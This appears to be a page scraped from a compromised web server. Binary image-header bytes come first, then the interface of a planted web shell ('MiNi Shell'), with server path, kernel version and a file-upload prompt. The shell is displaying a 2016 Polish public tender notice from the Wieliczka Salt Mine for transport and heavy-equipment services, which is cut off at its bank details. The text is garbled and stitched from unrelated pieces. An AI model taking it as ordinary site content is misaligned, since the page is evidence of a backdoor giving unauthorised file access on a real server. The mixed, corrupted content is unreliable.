JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160822/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160822/302125-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 302125 - 2016
              z dnia 2016-08-22 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Wieliczka: Usługi transportu samochodowego oraz sprzętu ciężkiego<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Kopalnia Soli "Wieliczka" Spółka Akcyjna, krajowy numer identyfikacyjny
              4168300000, ul.
              Park Kingi 
              1,
              32020  
              Wieliczka, woj.
              małopolskie, państwo
              , tel.
              12 2787111, 12 2787132, e-mail
              , faks
              122 787 110.
              <br />
              Adres strony internetowej (URL): www.kopalniawieliczka.eu<br /><br />
                Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne
                www.kopalniawieliczka.eu</div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Spółka Akcyjna - Górnictwo</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.kopalniawieliczka.eu</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.kopalniawieliczka.eu</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Zgodnie z art. 10c ust. 2 ustawy Pzp (Dz.U. z 2015 r. poz. 2164 z późn. zm.) składanie ofer odbywa się za pośrednictwem operatora ocztowego w rozumeniu ustawy z dnia 23 listopada 2012 r. Prawo pocztowe (Dz.U. poz. 1529 oraz z 2015 r. poz. 1830), osobiście lub za pośrednictwem posłańca Składanie oferty odbywa się za pośrednictwem operatora pocztowego w rozumeniu ustawy z dnia 23 listopada 2012 r. Prawo pocztowe (Dz.U. poz. 1529 oraz z 2015 r. poz. 1830), osobiście lub za pośrednictwem posłańca <br />
                Adres:
                <br />Kopalnia Soli "Wieliczka" Spółka Akcyjna, Park Kingi 1, 32-020 Wieliczka</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Usługi transportu samochodowego oraz sprzętu ciężkiego<br /><b>Numer referencyjny: </b>KSW/2016/EL/20<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />5<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiot zamówienia został podzielony na 5 części:
Część I zamówienia    Usługi krajowego transportu drogowego osób 
Część II zamówienia   Usługi krajowego transportu drogowego rzeczy samochodem o dopuszczalnej masie całkowitej do 3,5 t. 
Część III zamówienia  Usługi krajowego transportu drogowego  samochodem ciężarowym o dopuszczalnej masie całkowitej do 14,5 t. 
Transport 3 szt. zbiorników o pojemności 1 m3 napełnianych mieszanką do iniekcji (solanka z cementem)
Część IV zamówienia  Usługi sprzętem ciężkim oraz samochodem ciężarowym o dopuszczalnej masie całkowitej do 24 ton
Część V zamówienia  Usługi dźwigiem samochodowym
<br /><br /><b>II.5) Główny kod CPV: </b>60181000-0<br /><b> Dodatkowe kody CPV:</b>60171000-7,
                60172000-4,
                45500000-2<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w miesiącach: 12<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                a)dotyczy Wykonawców składających oferty na część I i/lub część II i/lub część III i/lub część IV i/lub część V zamówienia - wpis do jednego z rejestrów zawodowych lub handlowych prowadzonych w państwie członkowskim Unii Europejskiej, w którym Wykonawca posiada siedzibę, określonym w załączniku XI do dyrektywy 2014/24/U lub spełniają inne wymogi określone w tym załączniku lub wpis do Centralnej Ewidencji i Informacji o Działalności Gospodarczej.
b)dotyczy Wykonawców składających oferty na część I zamówienia - posiadanie licencji na wykonywanie transportu drogowego osób;
<br />
                Informacje dodatkowe
                W celu potwierdzenia spełniania warunków udziału w postępowaniu, wybrany Wykonawca zostanie zobowiązany do przedstawienia:
1)dokumentu potwierdzającego, że Wykonawca jest wpisany do jednego z rejestrów zawodowych lub handlowych, prowadzonych w państwie członkowskim Unii Europejskiej, w którym wykonawca ma siedzibę lub miejsce zamieszkania  dotyczy Wykonawców składających oferty na część I i/lub część II i/lub część III i/lub część IV i/lub część V zamówienia;
2)aktualnej licencji na wykonywanie przewozu drogowego osób  dotyczy Wykonawców składających oferty na część I zamówienia;<br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                a)dotyczy Wykonawców składających oferty na część I zamówienia - posiadanie przez Wykonawcę ubezpieczenia od odpowiedzialności cywilnej, w zakresie prowadzonej działalności gospodarczej w wysokości co najmniej 300 000,00 złotych (polisa, a w przypadku jej braku, innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony),
b)dotyczy Wykonawców składających oferty na część II  i/lub część III i/lub część IV i/lub część V zamówienia - Zamawiający nie wyznacza szczegółowego warunku w tym zakresie;<br />
                Informacje dodatkowe
                W celu potwierdzenia spełniania warunków udziału w postępowaniu, wybrany Wykonawca zostanie zobowiązany do przedstawienia polisy OC lub innego dokumentu potwierdzającego posiadanie przez Wykonawcę ubezpieczenia od odpowiedzialności cywilnej, w zakresie prowadzonej działalności gospodarczej w wysokości co najmniej 300 000,00 złotych - dotyczy Wykonawców składających oferty na część I zamówienia<br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                a) dotyczy Wykonawców składających oferty na część I zamówienia - dysponowanie pojazdami, niezbędnymi do realizacji niniejszego zamówienia, o następujących parametrach technicznych:
- co najmniej jednym samochodem osobowym do przewozu 5 osób łącznie z kierowcą, rodzaj nadwozia - sedan, czterodrzwiowy, o dopuszczalnej masie całkowitej do 3,5 tony, o pojemności silnika powyżej 1500 cm3, wyposażony w system klimatyzacji, rok produkcji: nie wcześniej niż 2008 r.;
oraz
- co najmniej jednym autobusem do przewozu minimum 46 osób łącznie z kierowcą, typ zabudowy: turystyczny, wyposażony w system klimatyzacji, pasy bezpieczeństwa, WC, ABS, ASR, retarder, ESP, rok produkcji: nie wcześniej niż 2008 r.;
oraz
- co najmniej jednym autobusem-mikrobusem do przewozu od 17 do 21 osób łącznie z kierowcą, wyposażony w system klimatyzacji, rok produkcji: nie wcześniej niż 2010 r.;
b) dotyczy Wykonawców składających oferty na część II zamówienia - dysponowanie pojazdem, niezbędnym do realizacji niniejszego zamówienia, o następujących parametrach technicznych
- co najmniej jednym samochodem ciężarowo-osobowym do przewozu ładunków oraz przewozu osób w liczbie do 3 łącznie z kierowcą, 
typ zabudowy: blaszak, o dopuszczalnej masie całkowitej nie przekraczającej 3,5 tony, o ładowności min. 1,0 tony, długości skrzyni ładunkowej min 3,0 m, wyposażony w system klimatyzacji, rok produkcji: nie wcześniej niż 2010 r.;
c) dotyczy Wykonawców składających oferty na część III zamówienia  dysponowanie pojazdami, niezbędnymi do realizacji niniejszego zamówienia, o następujących parametrach technicznych
- co najmniej dwoma samochodami ciężarowymi - wywrotkami do przewozu ładunków o dopuszczalnej masie całkowitej nie przekraczającej 14,5 tony, o ładowności min. 7 ton, długości skrzyni ładunkowej min 4,8 m, HDS  w wersji plecakowej dopinany z tyłu;
d) dotyczy Wykonawców składających oferty na część IV zamówienia - dysponowanie pojazdami, niezbędnymi do realizacji niniejszego zamówienia, o następujących parametrach technicznych:
- co najmniej jednym samochodem ciężarowym  wywrotką do przewozu ładunków, o dopuszczalnej masie całkowitej pojazdu - 24 ton, o ładowności od 8 do 16 ton, długości skrzyni ładunkowej wewnątrz od 6 do 8 m;
oraz
- co najmniej jedną ładowarką czołową, samojezdną, kołową, jednonaczyniową o pojemności naczynia od 0,5 do 1,2 m3, o maksymalnej wysokości naczynia  do 3,5 m;
oraz
- co najmniej jedną koparką samojezdną, kołową wyposażoną w zestaw minimum dwóch różnych łyżek, część robocza koparki wraz z kabiną winna wykonywać pełny obrót o 360o, maksymalna wysokość podnoszenia łyżki od 4 do 5m;
e) dotyczy Wykonawców składających oferty na część V zamówienia - dysponowanie pojazdem, niezbędnym do realizacji niniejszego zamówienia, o następujących parametrach technicznych:
- co najmniej jednym dźwigiem samochodowym, samojezdnym o udźwigu od 13 do 28 ton;
f) dotyczy Wykonawców składających oferty na część I zamówienia - udokumentowanie wykonania w okresie ostatnich 3 lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, co najmniej jednej usługi transportowej o wartości nie mniejszej niż 70 000,00 zł brutto,
g) dotyczy Wykonawców składających oferty na część II zamówienia -  udokumentowanie wykonania w okresie ostatnich 3 lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, co najmniej jednej usługi transportowej o wartości nie mniejszej niż 30 000,00 zł brutto, 
h) dotyczy Wykonawców składających oferty na część III i/lub część IV i/lub część V zamówienia - Zamawiający nie wyznacza szczegółowego warunku w tym zakresie;
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                W celu potwierdzenia spełniania warunków udziału w postępowaniu, wybrany Wykonawca zostanie zobowiązany do przedstawienia:
1) wykazu sprzętu dostępnego Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi pojazdami, sporządzonego według wzoru, stanowiącego załącznik nr 9 i/lub 10 i/lub 11 i/lub 12 i/lub 13 do specyfikacji - dotyczy Wykonawców składających oferty na część I i/lub część II i/lub część III i/lub część IV i/lub część V zamówienia;
2) wykazu usług transportowych wykonanych lub wykonywanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy lub usługi były wykonywane, lub są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu; wzory wykazów stanowią załączniki nr 14 i/lub 15 do specyfikacji - dotyczy Wykonawców składających oferty na część I i/lub część II zamówienia.
</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">W celu potwierdzenia okoliczności, o których mowa w art. 25 ust. 1 pkt 3 ustawy Pzp, Wykonawca zostanie zobowiązany do przedstawienia:
1) dokumentu potwierdzającego, że Wykonawca jest wpisany do jednego z rejestrów zawodowych lub handlowych, prowadzonych w państwie członkowskim Unii Europejskiej, w którym wykonawca ma siedzibę lub miejsce zamieszkania  dotyczy Wykonawców składających oferty na część I i/lub część II i/lub część III i/lub część IV i/lub część V zamówienia;
2) aktualnej licencji na wykonywanie przewozu drogowego osób  dotyczy Wykonawców składających oferty na część I zamówienia;
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />W celu potwierdzenia spełniania warunków udziału w postępowaniu, wybrany Wykonawca zostanie zobowiązany do przedstawienia:
1) polisy OC lub innego dokumentu potwierdzającego posiadanie przez Wykonawcę ubezpieczenia od odpowiedzialności cywilnej, w zakresie prowadzonej działalności gospodarczej w wysokości co najmniej 300 000,00 złotych - dotyczy Wykonawców składających oferty na część I zamówienia;
2) wykazu sprzętu dostępnego Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi pojazdami, sporządzonego według wzoru, stanowiącego załącznik nr 9 i/lub 10 i/lub 11 i/lub 12 i/lub 13 do niniejszej specyfikacji - dotyczy Wykonawców składających oferty na część I i/lub część II i/lub część III i/lub część IV i/lub część V zamówienia;
3) wykazu usług transportowych wykonanych lub wykonywanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy lub usługi były wykonywane, lub są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu; wzory wykazów stanowią załączniki nr 14 i/lub 15 do niniejszej specyfikacji - dotyczy Wykonawców składających oferty na część I i/lub część II zamówienia.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">W celu potwierdzenia spełniania wymagań określonych w części VIII specyfikacji, do oferty należy dołączyć:
1) dokumenty stwierdzające, iż oferowane środki transportu, którymi świadczone będą usługi, posiadają parametry techniczne określone w części III pkt 4 ppkt 4.1.2. specyfikacji (np. kserokopię dowodu rejestracyjnego pojazdu)
a) samochód osobowy w zakresie pkt 1, 6,
b) autobus w zakresie pkt 1, 4,
c) autobus  mikrobus w zakresie pkt 1, 2,
dotyczy Wykonawców składających oferty na część I zamówienia;
2) dokumenty stwierdzające, iż oferowany samochód ciężarowo-osobowy, którym świadczone będą usługi, posiada parametry techniczne określone w części III pkt 4 ppkt 4.2.2. specyfikacji (np. kserokopię dowodu rejestracyjnego pojazdu) w zakresie pkt 1, 7 
dotyczy Wykonawców składających oferty na część II zamówienia;
3) dokumenty stwierdzające, iż oferowany samochód ciężarowy wywrotka, którym świadczone będą usługi, posiada parametry techniczne określone w części III pkt 4 ppkt 4.3.11 specyfikacji (np. kserokopię dowodu rejestracyjnego pojazdu) w zakresie pkt 1, 2, 3
dotyczy Wykonawców składających oferty na część III zamówienia.
</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Część I zamówienia  Usługi krajowego transportu drogowego osób 
1.	Wadium w wysokości: 1 500,00 złotych należy wnieść przed upływem terminu składania ofert, określonym w części XIV pkt 2 specyfikacji.
2.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy:
Bank Pekao Spółka Akcyjna Oddział w Wieliczce
Konto: 75124047481111000048778501 
